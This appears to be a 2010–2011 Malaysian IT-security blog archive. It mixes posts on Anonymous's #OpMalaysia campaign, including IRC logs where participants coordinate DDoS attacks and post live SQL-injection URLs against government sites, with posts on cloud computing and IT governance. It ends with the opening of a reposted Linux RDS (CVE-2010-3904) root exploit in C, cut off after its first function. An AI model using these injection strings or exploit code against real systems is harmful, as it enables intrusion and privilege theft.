 10[07:14] * Joins: d0ct0r (d0ct0r@anon.y.mous)
 02[07:16] * Quits: setsuna00 (chiasengkiat@AN-2fq.6qh.b7n9eh.IP ) (Quit:  )
 10[07:18] * Joins: sluggo (Mibbit@AN-h92.d6n.j3pqkf.IP)
 02[07:19] * Quits: d0ct0r (d0ct0r@anon.y.mous ) (Z-Lined )
 02[07:20] * Quits: sluggo (Mibbit@AN-h92.d6n.j3pqkf.IP )
Session Close: Fri Jun 17 07:23:30 2011
#----- REMOVED -----#

#OpMalaysia - Day 1

2011-06-16T12:59:00.003+08:00

Last night, most of Malaysian Security Community/Group join the anonops network for various reasons. The attacks started at 2330hrs Malaysian time. The hacker group is into co-ordinated attacks and keeps to its word when it comes to launching its attacks. These are likely independent hackers taking advantage of the publicity. Some say "sites may not have been hacked by Anonymous." CyberSecurity Malaysia, responsible for the nation's borders in cyberspace, confirmed that several websites were hacked. But it declined to say how many and which were the sites.

Well, these are some of the confirmed lists. Sites tagged with [Down] indicator means either it has been DDoS-ed or switched off by government. Confirm first whether the site are down or not by visiting this page http://www.isup.me:

- Malaysia Official Government Website [link] – [Down]
- SabahTourism.com [link] [Hacked][Leaked]
- CIDB [link] [Hacked] [Up]
- Land Public Transport Commision [link] [Suspected]
- Malaysian Meteorological Service [link] [Down]
- ASEANconnect [link] [Suspected]
- Hollywood-Artist.info [link] [Suspected]
- Ministry of Education [link] [Down]
– Suruhanjaya Pilihanraya Malaysia [link] [Down]
- Bomba [link][Down]
- TMNet [link][Down]
- Perbendaharaan Malaysia [link] [Down]
- Kementerian Kerja Raya Malaysia [link] [Down]
- Parlimen Malaysia [link] [Down]
- JobsMalaysia [link] [Down]
- Kementerian Penerangan, Komunikasi dan Kebudayaan [link] [Down]
- Portal KSM [link] [Down]
- Majlis Sukan Negara [link] [Down]
- gengblogger.com [link] [Hacked]

#OpMalaysia channel logs:

Session Start: Wed Jun 15 20:08:36 2011
Session Ident: #OpMalaysia
 03[20:08] * Now talking in #OpMalaysia
 03[20:08] * Topic is ' 10Target:  7When OP takes place  10| Status:  4Up  10| Press Release:  14http://uleak.it/?3kn  10| When:  6June 15, 2011 7:30PM GMT  10| Flyer:  7http://uleak.it/?3kp  10| New to IRC or Hacking? Join  5#OpNewBlood or #Tutorials  10|Video:  11http://uleak.it/?3j7  10| VPN Guide:  11http://uleak.it/?3kq  '
 03[20:08] * Set by Anon_Tim on Wed Jun 15 10:54:50
[20:08]  i want to exploit it now
#----- REMOVED -----#
[21:00]  ptptn website would be best...haha
[21:00] <@morrissey> lol. who doesnt wish to get a 4flat? :P
[21:00]  i mean with daylight saving in, say the UK, it's 2pm now here but its 9pm in KL
[21:00]  haha
[21:01] <@OnlyWork> al wanted ptptn
 10[21:01] * Joins: WebAnon49361 (WebAnon49361@AN-4k9.7di.6jjkdg.IP)
[21:01]  so 4.30 it is
[21:01]  i wish had 4 flat in computer science :D
[21:01]  aiya dont attack ptptn nanti student susah woh :)
#----- REMOVED -----#
[21:01]  we can hack ptptn and burn the records, how is it sound?
[21:01] <@OnlyWork> and anono wont target financial side
#----- REMOVED -----#
[21:34]  hack ptptn please lmao
[21:34]  hahaha
 10[21:35] * Joins: Narakkk (Mibbit@AN-1hj.nid.7ssl5k.IP)
[21:35]  dont hack ptptn pls
 10[21:35] * Joins: noname (noname@AN-acb.532.7ssl5k.IP)
[21:35]  i got 70k loan
[21:35]  it's a final countdown
 10[21:35] * Joins: Aizad (textual@AN-vp2.5rh.5s204u.IP)
[21:35]  later increase become 1000k
[21:35]  LOL
[21:35]  LOL~
#----- REMOVED -----#
[23:30]  ========    attention the attack has begin!      =========
[23:31]  ========    attention the attack has begin!      =========
[23:31]  ========    attention the attack has begin!      =========
[23:31]  ========    attention the attack has begin!      =========
 10[23:31] * Joins: kreuger (Kreuger@AN-0k0.gaa.jsqf2k.IP)
[23:31]  ========    attention the attack has begin!      =========
#----- REMOVED -----#
[23:35]  cant connect to www.malaysia.gov.my
[23:35]  Malaysian police vows want to arrest anon members...rofl
[23:35]  u kill him
[23:35]  Yeah same
[23:35]  hahahha
[23:35]  they're scared already...
[23:36]  La primera ola pequeño ataque ha comenzado. Misión # 1: Stormrider
[23:36]  admin
[23:36]  who scared?
 10[23:36] * Joins: Anon97 (Sfrontierz@AN-9l5.u50.s7l9t5.IP)
 02[23:36] * Quits: Anon97 (Sfrontierz@AN-9l5.u50.s7l9t5.IP ) (Quit:  )
[23:36]  noted. cant access malaysia.gov.my
[23:36]  u mean police member?
 10[23:36] * Joins: Anon97 (Sfrontierz@AN-9l5.u50.s7l9t5.IP)
[23:36]  cuz
[23:36]  got ddos
[23:36]  Vv6: police lah
[23:36]  [23:36] * Dns resolving malaysia.gov.my
[23:36]  -
[23:36]  [23:36] * Dns unable to resolve malaysia.gov.my
[23:36]  -
#----- REMOVED -----#
[00:43]  What's the current target btw
[00:43]  !topic
 08[00:43] -Chuck:#OpMalaysia- Channel Topic:  10Target:  7When OP takes place  10| Status:  4Up  10| Press Release:  14http://uleak.it/?3kn  10| When:  6June 15, 2011 7:30PM GMT  10| Flyer:  7http://uleak.it/?3kp  10| New to IRC or Hacking? Join  5#OpNewBlood or #Tutorials  10|Video:  11http://uleak.it/?3j7  10| VPN Guide:  11http://uleak.it/?3kq 
[00:43]  yeah
[00:43]  ok this is funny https://www.facebook.com/mydragonforce/posts/231170146909664
[00:43] <~Effexor> Title: Di hack untuk kali... | Facebook (at www.facebook.com)
[00:43]  the new site
[00:43]  malaysia edition of piratebay
[00:43]  I am drunk, i sufffer from PMS, so be cautios
[00:43]  still on beta testing
 02[00:43] * Quits: SledgeAcidBurn (eddie@AN-u28.rmd.4tc11b.IP ) (Ping timeout: 121 seconds )
[00:43]  lol
[00:43]  ok thanks for the info
[00:43]  and I am lstening ti Ministry
 10[00:43] * Joins: mib_ufhywg (Mibbit@AN-h94.76m.p5m5r0.IP)
[00:44]  Hey, is http://www.your-freedom.net/ Safe? What do you think?
[00:44]  your bleeding bishop
[00:44]  wow malaysiabay its good :D
[00:44] <~Effexor> Title: Your Freedom - Bypass firewalls and proxies, stay anonymous (at www.your-freedom.net)
[00:44]  i am bleeding
[00:44]  1malaysia.gov.my is down??
[00:44]  lol bishop
[00:44]  http://www.samair.ru/proxy/socks.htm
[00:44] <~Effexor> Title: SOCKS servers lists (at www.samair.ru)
[00:44]  http://www.the8unit.com.my/news.php?id=%275 injeq~
[00:44]  !hive
[00:44] <~Effexor> Title: The 8 Unit (at www.the8unit.com.my)
 04[00:44] * joepie91 sets mode: -b *!*moar@staff.anonops.li
[00:44]  1malaysia.gov.my is down??
[00:44]  Sht_Tha_Fck_Up: do NOT use free VPNs
 04[00:44] * Chuck sets mode: +b *!*moar@staff.anonops.li
 04[00:44] * joepie91 was kicked by Chuck (Turn caps lock OFF! )
 10[00:44] * Joins: joepie91 (moar@staff.anonops.li)
[00:44]  http://www.downforeveryoneorjustme.com/malaysia.gov.my
[00:44]  !hive
[00:44] <~Effexor> Title: http://malaysia.gov.my Is Down -> Check if your website is up or down? (at www.downforeveryoneorjustme.com)
#----- REMOVED -----#
[00:59]  http://penang.uitm.edu.my/   <----- hackeddddddd
[00:59]  Title: H4ck3D By H3x4CreW RileksCreW 3viLc0d3s (at penang.uitm.edu.my)
[00:59]  Title: H4ck3D By H3x4CreW RileksCreW 3viLc0d3s (at penang.uitm.edu.my)
[00:59]  please dont ddos through proxy, you will dos the proxies not the site
#----- REMOVED -----#
[02:11]  stop using caps
 03[02:12] * ` is now known as D-Mist
[02:12]  xUmaRix: wak lu
[02:12]  http://www.cidb.gov.my/v6/?q=en/content/150%27%20OR%201;%20--
[02:12]  what is wak lu?
[02:12]  LULZ
[02:12]  DNS
[02:12]  can some1 ban the hibsec guy?
[02:12]  hi xUmaRix
[02:12]  SQL Injection :S http://www.cidb.gov.my/v6/?q=en/content/150%27%20OR%201;%20--
[02:12]  DNS ftw
#----- REMOVED -----#
 00[02:36] * bishop changes topic to 'IDEAS: http://piratenpad.de/hecz4sSj74 | Status: Up | Press Release: http://uleak.it/?3kn | When: June 15, 2011 7:30PM GMT | Flyer: http://uleak.it/?3kp | New to IRC or Hacking? Join #OpNewBlood or #Tutorials |Video: http://uleak.it/?3j7 | VPN Guide: http://uleak.it/?3kq | English Only Please '
 02[02:36] * Quits: kc (Mibbit@AN-v8g.uq1.chhu9g.IP ) (Quit: http://www.mibbit.com ajax IRC Client )
[02:36]  What are your targets supposed to be?
[02:36]  coordinate it!
 10[02:36] * Joins: opsony717 (opsony717@AN-qnc.qvr.fa4d8v.IP)
[02:36]  how about malaysia cop website
[02:37]  www.rmp.gov.my
[02:37]  .gov.my
 09[02:37] * WebAnon1921 slaps WebAnon1921 around a bit with a large fishbot
[02:37]  www.mod.gov.my running IIS 7.0
 03[02:37] * open-G0NE is now known as opensourcerer
[02:37]  we take down 1 by one.
[02:37]  YAH Take down the malaysian cop website!!!
#----- REMOVED -----#
[02:42] <@w33dy> PROBLEM: Malaysia blocks filesharing sites.
[02:42] <@w33dy> GOAL: * Help Malaysians get around filters
[02:42] <@w33dy>            * Create media attention for the cause
 10[02:42] * Joins: ab_nh (Mibbit@AN-9jl.cjh.p5m5r0.IP)
 02[02:42] * Quits: kambing (EpicAnon@AN-s7d.7s9.ndc0v8.IP ) (Quit:  )
 02[02:42] * Quits: se7en (se7en@AN-453.41i.qadka5.IP ) (Ping timeout: 121 seconds )
 02[02:42] * Quits: Sh1nky (Mibbit@AN-4pa.vpg.cpfies.IP ) (Quit: http://www.mibbit.com ajax IRC Client )
[02:42]  http://www.blm33.net/opmy.php
[02:42]  Umarix, you coordinate this attack.
[02:42] <@w33dy> POSSIBLE SOLUTIONS
[02:42] <@w33dy> =====================
[02:42] <@w33dy> 1. Unpublicized TOR nodes (these cannot be blocked because they are not publicly known, you can only use them when you have the IP)
[02:42] <@w33dy>     Howto: (insert link to howto here)
[02:42] <@w33dy>     
[02:42] <@w33dy> 2. Set up mirrors of filesharing sites
[02:42] <@w33dy>     -> Use something like httrack/wget to set up a mirror of thepiratebay etc on some spare server space? Suggestions welcome
 10[02:42] * Joins: Anonnite (Mibbit@AN-1dl.1bq.75uftt.IP)
[02:42] <@w33dy>     
[02:42] <@w33dy> 3. Set up alternatives 
[02:42] <@w33dy>     Basically, set up your own filesharing sites. Make them as accessible as possible
[02:42] <@w33dy>     Multiple domains, multiple IPs, etc.
[02:42]  changing DNS?
 10[02:42] * Joins: drusoft (drusoft@AN-fan.vsa.mpq0id.IP)
[02:42]  http://www.rmp.gov.my/ Server Error
[02:42] <@bishop> w33dy: put it on tha PAD
[02:42]  The server encountered an internal error and was unable to complete your request.
[02:43] <%Effexor> Title: Laman Web Rasmi Polis Diraja Malaysia (at www.rmp.gov.my)
[02:43]  +m?
[02:43]  using VPN and proxy servers.
#----- REMOVED -----#
[02:56]  do not try edu . that's not cool
[02:56] <@esc> legion: Has nothing to do with this op. :)
 04[02:56] * weezas was kicked by bishop (terminated )
 04[02:56] * legion was kicked by shift (wrong chan kiddo )
 02[02:56] * Quits: intan (asdasds@AN-coc.jri.nkkgq7.IP ) (Ping timeout: 121 seconds )
[02:56] <&shift> o/
[02:56]  no edu right ?
 02[02:56] * Quits: WebAnon24787 (WebAnon24787@AN-p53.t55.1gsc09.IP ) (Ping timeout: 121 seconds )
 10[02:56] * Joins: D-Mist (gdsa@AN-u0e.fje.jsqf2k.IP)
[02:56]  Attacking malaysia.gov.my won't work
 10[02:56] * Joins: weezas (weezas@AN-vmd.1me.r07okb.IP)
 10[02:56] * Joins: Alice (Mibbit@AN-k1v.3uq.krpp7c.IP)
[02:56]  yea haizz
[02:56]  http://www.skmm.gov.my/ 
[02:56]  hehe
[02:56] <@bishop> NO .edu, NO media
[02:56]  siorry
[02:56] <%Effexor> Title: MCMC | SKMM (at www.skmm.gov.my)
[02:56] <@bishop> NO .edu, NO media
[02:56]  Anon_Tim: y not?
[02:56]  attacking .gov.my nameserver ?
[02:56] <@bishop> NO .edu, NO media
#----- REMOVED -----#
[03:04] <&Cake> READ IT
[03:04]  :(
[03:04]  VPN ppl, VPN!
[03:04] <~Nessuno> DISCUSS TARGETS
[03:04] <&Cake> stick to topic
 10[03:04] * Joins: mib_zo1ks8 (Mibbit@AN-0vm.b5v.skvune.IP)
[03:04]  aim: freedom of speech..stay focus
[03:04] <@bishop> targets go here: http://piratenpad.de/hecz4sSj74
[03:04] <%Effexor> Title: PiratenPad: hecz4sSj74 (at piratenpad.de)
[03:04]  Else, we'll see Msians going to jail tomorrow
[03:04]  I thought this wasn't a LOIC operation
[03:04]  PENERANGAN.GOV.MY still up
 [03:04] <+joepie91> nessuno
[03:04] <+joepie91> pm
[03:04] <+wabbit> there should be plenty lmao
[03:04]  PENERANGAN.GOV.MY still up
#----- REMOVED -----#
 04[03:06] * Nessuno sets mode: +m
[03:06] <%Effexor> Title: Toll Equipment Monitoring System - TEMS (at 211.25.171.89)
[03:06] <%Effexor> Title: CyberSecurity Malaysia (at www.cybersecurity.my)
 10[03:06] * Joins: mr_hollow (Mibbit@AN-91l.ksd.ga0n5v.IP)
[03:06] <&Cake> tgkje, you attacking by yourself? GL kid
 02[03:06] * Quits: mib_s9msk8 (Mibbit@AN-8de.vsa.mpq0id.IP ) (Quit: http://www.mibbit.com ajax IRC Client )
 10[03:06] * Joins: Dark_Night (FuckYeah@Opitaly.it)
[03:06] <~Nessuno> WE NEED TO DISCUSS A CLEAR PLAN OF ACTION.  WE ARE NOT JUST ALL ABOUT DDOS
[03:06] <~Nessuno> WE NEED TO DISCUSS A CLEAR PLAN OF ACTION.  WE ARE NOT JUST ALL ABOUT DDOS
[03:06] <~Nessuno> WE NEED TO DISCUSS A CLEAR PLAN OF ACTION.  WE ARE NOT JUST ALL ABOUT DDOS
 04[03:06] * Nessuno sets mode: -m
[03:06]  :o
[03:06] <~Nessuno> got it?
[03:06] <+wabbit> yea
[03:06]  spam it? :D
[03:06]  Roger that
#----- REMOVED -----#
[03:09] <+joepie91> ok
[03:09] <+joepie91> guys
[03:09] <+joepie91> listen up
[03:09] <+joepie91> we need your help to think of methods
[03:09] <+joepie91> to make this operation work
[03:10] <+joepie91> and LOIC is NOT an option
 10[03:10] * Joins: brn (thc@AN-nmt.k7o.gccsid.IP)
 10[03:10] * Joins: Pepper-D (Mibbit@AN-282.c78.832d04.IP)
[03:10] <+joepie91> you can discuss here: http://piratenpad.de/hecz4sSj74 but please leave the pad when you are not working on it
[03:10] <@bishop> guys, cool down: http://30.media.tumblr.com/tumblr_lle2cfkzTF1qa8vdgo1_400.png
[03:10] <%Effexor> Title: PiratenPad: hecz4sSj74 (at piratenpad.de)
[03:10] <+joepie91> because there is a user limit
 10[03:10] * Joins: w3eedy (w33dy@AN-re0.3iv.o5kn42.IP)
 10[03:10] * Joins: omny (no@AN-3v4.a8g.s7l9t5.IP)
 02[03:10] * Quits: brn (thc@AN-nmt.k7o.gccsid.IP ) (Quit:  1Full Throttle: made in Brazil  )
 02[03:10] * Quits: JamesDoe (James@Chasing.your.tail ) (Quit: Leaving )
[03:10] <+joepie91> so, basically
[03:10] <+joepie91> do your best on finding ways to make this op a sucess
 02[03:10] * Quits: ImSeeker32 (WebAnon19930@AN-btg.0oo.pafme2.IP ) (Ping timeout: 121 seconds )
[03:10] <+joepie91> ways that do not involve loic
[03:10] <+joepie91> or ddos
[03:10] <+joepie91> or hacking sites
#----- REMOVED -----#
[03:13] <@OperationLol> I don't know what people meant  by Non LOIC mission.
[03:13] <@OperationLol> ?
[03:13] <@OperationLol> Like really.
[03:13] <@OperationLol> :P
[03:13]  I completely agree with you OperationLol
[03:13]  help  me plss y i cant open loic??
[03:13]  bypass blocked using hotspot shield. protect your i.p first. thanks.
[03:13]  If they want to discuss about it, they can just go to the forums, or facebook
[03:13] <@OperationLol> Yes,
 10[03:13] * Joins: opmalaysia881 (opmalaysia881@AN-1cu.9hb.nkkgq7.IP)
 02[03:14] * Quits: xUmaRix (rosmah@jolok.najibrazak.arse.mu ) (Ping timeout: 121 seconds )
[03:14] <~Nessuno> OperationLol LOIC will acheive fuck all
[03:14] <@OperationLol> Now heres the place were action takes place.
[03:14] <@OperationLol> Tell em to get a VPN
[03:14] <%Anon_Tim> Operation
[03:14]  http://www.1malaysia.com.my/test.php
[03:14]  how to get VPN?
[03:14] <%Effexor> Title: Untitled Document (at www.1malaysia.com.my)
[03:14] <@esc> Loic will achieve nothing. You can down their sites and thats all. Afterwards you'll still have the same problems.
[03:14]   :)
[03:14] <%Anon_Tim> This was meant to be a LOIC operation
[03:14] <%Anon_Tim> Attacking certain IPs
[03:14]  That's what hacktivism is about
[03:14]  lol ded1
[03:14]  they start already?
[03:14]  kecoh siy0t
[03:14]  what problem esc?
[03:14]  hah hacktivists
[03:15] <%Anon_Tim> We were going to release the IPs one by one
 02[03:15] * Quits: wtvengeance (wtvengeance@what.the.vengeance ) (Connection closed )
 02[03:15] * Quits: lilybet (Mibbit@AN-pjo.df0.ikj289.IP ) (Quit: http://www.mibbit.com ajax IRC Client )
[03:15] <%Anon_Tim> All of us attacking it at the same time 'till they're all down
[03:15] <+joepie91> LOIC will do absolutely fucking NOTHING
[03:15] <%Anon_Tim> We attack them, the whole server's down
#----- REMOVED -----#
[03:19] <@OperationLol> Sure pal
* Joins: elChe (elChe@FreedomOrNothing.nsa.gov) <--- Nice try
[03:19] <@esc> USA based VPNs are required to log by law.
#----- REMOVED -----#
[04:17] <&esc> press requests/interviews should be handled in #reporter
[04:17] <@joepie91> oh, it redirects you there?
[04:17]  So I woke up for nothing?
[04:17]  getting mariried to godop..fyi, ded1
[04:17] <&esc> press requests/interviews should be handled in #reporter
#----- REMOVED -----#
[04:24]  plan! plan!
[04:24]  some day, I believe malaysian will only allow to browse malaysian website. no more international web.
[04:24]  I am done
 02[04:24] * Quits: opc_69 (opc_69@AN-3g7.ski.9tq214.IP ) (Ping timeout: 121 seconds )
[04:24] <@joepie91> tm_press: stop the anti-propaganda, srsly
 03[04:24] * leman is now known as putra
[04:24]  komkom: najib has a twitter, go there and whining to him..
[04:24]  .
[04:24]  prabu^: lol
 10[04:24] * Joins: mib_hbsp2t (Mibbit@AN-bd4.egt.5s204u.IP)
[04:24]  yeah
[04:24] <@joepie91> I know how it is there
[04:24]  stop it
[04:24] <@joepie91> cut the bullshit
[04:24]  i dont care bout the 1.8m. the damage is done. 
 03[04:24] * agobot is now known as b0xn3t
[04:24]  better fuck the server right now
 03[04:24] * LunarEclipse is now known as Bijan
[04:24]  less talk 
[04:24]  here I come
[04:24] <@bishop> http://theos.in/windows-xp/free-fast-public-dns-server-list/  FREE DNS SERVERS
[04:24]  Damage? :O
[04:24] <%Effexor> Title: Free Fast Public DNS Servers List (at theos.in)
[04:24] <@bishop> http://theos.in/windows-xp/free-fast-public-dns-server-list/  FREE DNS SERVERS
[04:24]  u think najib will read it ?
[04:24]  fine, i'm changing my name
[04:24]  done, registered nick. 
 10[04:25] * Parts: mizy (jason.bourne@AN-689.3sh.ipasrr.IP)
 10[04:25] * Joins: mizy (jason.bourne@AN-689.3sh.ipasrr.IP)
[04:25] <@joepie91> bishop: was about to post that lol
[04:25]  he only hire other people to read
[04:25]  damage : 1.8m spent
[04:25] <@joepie91> => Service provider: Google
[04:25] <@joepie91> Google public dns server IP address:
[04:25] <@joepie91> 8.8.8.8
[04:25] <@joepie91> 8.8.4.4
[04:25] <@joepie91> => Service provider:Dnsadvantage
[04:25] <@joepie91> Dnsadvantage free dns server list:
[04:25] <@joepie91> 156.154.70.1
[04:25] <@joepie91> 156.154.71.1
[04:25] <@joepie91> => Service provider:OpenDNS
[04:25] <@joepie91> OpenDNS free dns server list / IP address:
[04:25] <@joepie91> 208.67.222.222
[04:25] <@joepie91> 208.67.220.220
[04:25] <@joepie91> => Service provider:Norton
[04:25] <@joepie91> Norton free dns server list / IP address:
[04:25] <@joepie91> 198.153.192.1
[04:25] <@joepie91> 198.153.194.1
[04:25] <@joepie91> => Service provider: GTEI DNS (now Verizon)
[04:25] <@joepie91> Public Name server IP address:
[04:25] <@joepie91> 4.2.2.1
[04:25] <@joepie91> 4.2.2.2
[04:25] <@joepie91> 4.2.2.3
[04:25] <@joepie91> 4.2.2.4
[04:25] <@joepie91> 4.2.2.5
[04:25] <@joepie91> 4.2.2.6
[04:25] <@joepie91> => Service provider: ScrubIt
[04:25] <@joepie91> Public dns server address:
[04:25] <@joepie91> 67.138.54.100
[04:25] <@joepie91> 207.225.209.66
[04:25]  gr4ci, open source is not necessarily free.. it just open source
[04:25] <@joepie91> set these IPs as your nameservers
[04:25] <@joepie91> lemme get a guide
#----- REMOVED -----#
[04:39] <%Effexor> Title: #OpMalaysia Anonymos (at pastehtml.com)
[04:39]  Ebb: I know :D 
[04:39]  gr4c1 - mind to share with us?
[04:39]  lmao! cheeky
 10[04:40] * Joins: d3ck4 (d3ck4@AN-nae.cqh.cffsad.IP)
[04:40]  what happen to cimb?
 10[04:40] * Joins: zer03 (zer03@AN-g0j.vsa.mpq0id.IP)
[04:40]  but they dont know that irc also is a place to people exchange idea
[04:40]  but dont forget. a nornal practice of a hacker is performing ddos as the last option
#----- REMOVED -----#

Cyber Threats: Operation Malaysia

2011-06-14T10:11:00.002+08:00

F-Secure Corporation Chief Research Officer, Mikko Hypponen, tweeted about the threat at 4.42am Malaysian time.

The group, which calls itself Anonymous, said it will launch the attack at 7.30pm GMT on Wednesday (3.30am Thursday Malaysian time) and has named it “Operation Malaysia.”

The posted a mission statement to Pastebin on June 12 describing the reasoning behind their planned and upcoming attack on official Malaysian government websites. Anonymous warned, “

We fear that if you make further decisions to take away human freedom, we [will be] obligated to act fast and have no mercy.”

Anonymous revealed that target countries are selected based on input from users in those countries, however when asked whether or not there were Anonymous in Malaysia, they responded only that “[We] cannot give you that info.” It posted the threat in a graphic on this website.

Anonymous apparently comprises a vast number of hackers in various countries, who have been organised into cells that share common goals. They operate anonymously but in a co-ordinated fashion.

Reference: theepochtimes and TheStar Online

Cloud Computing Initiative: TAIWAN

2011-06-10T17:46:00.000+08:00

As I mentioned on my previous post, other things that I think I should share is the Chunghwa Telecom & Chairman of Committee on Cloud Services, Cloud Computing Association in Taiwan, Dr Yen-Sung Lee

SVP & COO presentation.

He mentioned that, Taiwan government has developed a Cloud Computing Roadmap since January 2010. He said, "it was started with the initiation of the Cloud Computing Organization, to help cloud computing industries specially in their country." Now, Taiwan has six (6) Cloud Centers or initiatives:

Cloud Operation Center - A centralized monitoring, resource provisioning and management facilicities
Cloud Testing Center - Facilities to provide various test and verification services e.g. stress test, interface test, functional test, security test
Cloud Research & Development Center - Develop the key technologies of Cloud Computing and collaborate with industries and academic institutes
Cloud Experience Center - Provide enterprise users experiencing cloud services and technologies in actual environment
Cloud Service Creation Platform - Build a high-capacity Platform-as-a-Service (PaaS) platform to enrich the software development environment
Innovation and Application Contest - To encourage innovative service development across Taiwan

IT Spending Decisions Over The Next 12-18 months

2011-06-08T09:58:00.002+08:00

ESG research indicates that, in 2011, the top two business initiatives that will have the greatest impact on IT spending are cost reduction and business process improvements. Close behind, in the top four is improving business intelligence and delivery of real-time analytics.

Real-time analytics is considered both an operational must-have and a strategic competitive advantage. With such increasing priority, the much-coveted data scientist needs access to a platform that supports data mining and complex analytics to scale; is agile in supporting evolving data types; can ingest massive volumes of new data sets quickly or recover just as quickly should the data load fail; and can present a prototyping environment to test models without breaking the bank. This last requirement is so crucial because, while budgets are growing modestly, IT is still required to do more with less. Once these models have been tested, they must be operationalized so that the business can benefit on a day to day basis. Shifting to a more real-time operational business model means analytics platforms with more advanced data management features as they become systems of record.

Source: ESG

IT Architect Jokes

2011-06-06T17:32:00.000+08:00

Recently, I attended Cloud Computing Conference at Singapore. One interest me is the IASA presentation which I considered as a brilliant jokes. We may not realized this but I think it is a reality.

Anyone who has more than 10 years of IT project implementation experience
Has performed various IT roles such as developers, system analyst, project manager, network/server engineer, PMO, CTO, etc
Failed in couple of large IT projects and burned millions of dollars without being put to jail

Information Security Architecture

2011-01-30T18:19:00.000+08:00

Been busy designing Information Security Architecture for some company.

Stop Killing Innovation

2010-11-23T14:14:00.001+08:00

I read an interesting post from RICHARD BEJTLICH that talked about "Innovation". I decided to share his post here, enjoy reading.

I hear and read a lot about how IT is supposed to innovate to enable "the business." Anytime I see "IT" in one part of a sentence and "the business" in another, a little part of me dies. Somewhere there is a Nirvana where "thought leaders" understand that there is no business without IT, that IT is as part of the business as the sales person or factory worker or janitor, and that IT would be better off not constantly justifying its existence to "the business." But I digress.

I want to address the "innovation" issue in this post. CIO magazine recently published an interview with Vinnie Mirchandani titled Taking Business Risks With Your IT Budget. I liked what Mr Mirchandani had to say, although I'm going to omit his multiple references to "cloud." Instead, consider how he sees innovation in IT:

More [CIOs] want to be [innovators], but organizations don’t let them...

In the 1980s, we talked about IT as a competitive advantage... In the 1990s, we didn’t hear much of that at all, and IT started reporting to CFOs. In the early 2000s, the CFO made IT a compliance function for auditing and security.

We’ve beaten the innovation out of CIOs at many companies. We want them to be risk mitigators, not innovators. People are afraid to be associated with any failure. They buy IT from vendors that are safe choices. They know they’re overspending, yet they do it anyway...

Mr Mirchandani doesn't say this, but he could have also mentioned that many managers expect CIOs to be "productivity engines," meaning they inherently shrink their budget every year. This drives cost reduction as the primary goal for an IT shop -- not innovation. It's like expecting the business development team to concentrate on decreasing the amount of money spent per new customer acquired, while not caring so much on the quantity or quality of the new customers -- if any!

So what to do?

The best thing they could do is get out from under the CFO. Go to your CEO and say, “I want to report to you.” Make sure the CFO doesn’t stand in the way. Some CIOs will get fired for doing that. Others will get a chance...

Cost pressure isn't limited to those who only report to the CFO, but he doesn't address that issue.

The shocking thing about corporate IT is that without realizing it, 85 percent to 90 percent of the IT spend is with a vendor, including outsourcers and the staff you buy from them...

When you’re spending 90 percent of your money with a vendor, you have only a sliver left for [internal] talent — yet it’s with your own internal talent that you can innovate. There’s very little left for CIOs to innovate with.

The more progressive CIOs are saying they’ve overdone it with outsourcing and are starting to hire their own enterprise architects and business analysts and other strategic resources.

To me this is the crux of the issue. Businesses cannot outsource innovation. Businesses can crush innovation pretty easily though.

I found one comment he made about the cloud to be very interesting:

CIOs resist it. It’s not secure, they say. It’s not always available. CIOs say cloud vendors go down too often.

I know CIOs who haven’t run a full disaster-recovery drill for years and turn around and say that the cloud isn’t production-ready.

So, my message to readers is this: if cost-out, five nines uptime, outsourced workforces, and other failed strategies are your goal, forget innovation. If you want innovation to thrive, try considering the alternatives.

Source: Richard Blog
Reference: CIO - Taking Business Risk with Your IT Budget

COBIT-Framework: Basic Principle

2010-11-12T16:45:00.000+08:00

COBIT is an IT governance framework and supporting toolset that allows managers to bridge the gap between control requirements, technical issues and business risks. COBIT enables clear policy development and good practice for IT control throughout organizations. COBIT emphasizes regulatory compliance, helps organizations to increase the value attained from IT, enables alignment and simplifies implementation of the COBIT framework.

Business orientation is the main theme of COBIT. It is designed not only to be employed by IT service providers, users and auditors, but also, and more important, to provide comprehensive guidance for management and business process owners. The COBIT framework is based on the following principle:

"To provide the information that the enterprise requires to achieve its objectives, the enterprise needs to invest in and manage and control IT resources using a structured set of processes to provide the services that deliver the required enterprise information."

Review for Network Security The Complete Reference

2010-10-22T21:13:00.003+08:00

I've been looking for "Onion Methodology" for past few weeks. Network Security The Complete Reference has it.

"The Onion Model of Defense is a layered strategy, sometimes referred to as Defense in Depth. This model addresses the contingency of pa perimeter security breach occurring."

"Consider what happens when an invader picks the front door lock or breaks a window to gain entry to a house? The homeowner may hide cash in a drawer and may store valuable jewels in a safe. These protective mechanisms address the contingency that the perimeter security fails. They also address the prospect of an inside job. The same principles apply to network security. What happens when an attacker gets past the firewall? What happens when a trusted insider, like an employee or a contractor, abuse their privileges? The onion model addresses these contingencies."

Generally, the book is about a comprehensive resource that provide all the information necessary to formulate strategies to obtain and implement a network security program. A five star book.

Linux RDS Protocol Local Privilege Escalation

2010-10-21T22:07:00.014+08:00

/* 
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg 
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define RECVPORT 5555 
#define SENDPORT 6666

int prep_sock(int port)
{
 
 int s, ret;
 struct sockaddr_in addr;

 s = socket(PF_RDS, SOCK_SEQPACKET, 0);

 if(s < 0) {
  printf("[*] Could not open socket.\n");
  exit(-1);
 }
 
 memset(&addr, 0, sizeof(addr));

 addr.sin_addr.s_addr = inet_addr("127.0.0.1");
 addr.sin_family = AF_INET;
 addr.sin_port = htons(port);

 ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));

 if(ret < 0) {
  printf("[*] Could not bind socket.\n");
  exit(-1);
 }

 return s;

}

void get_message(unsigned long address, int sock)
{

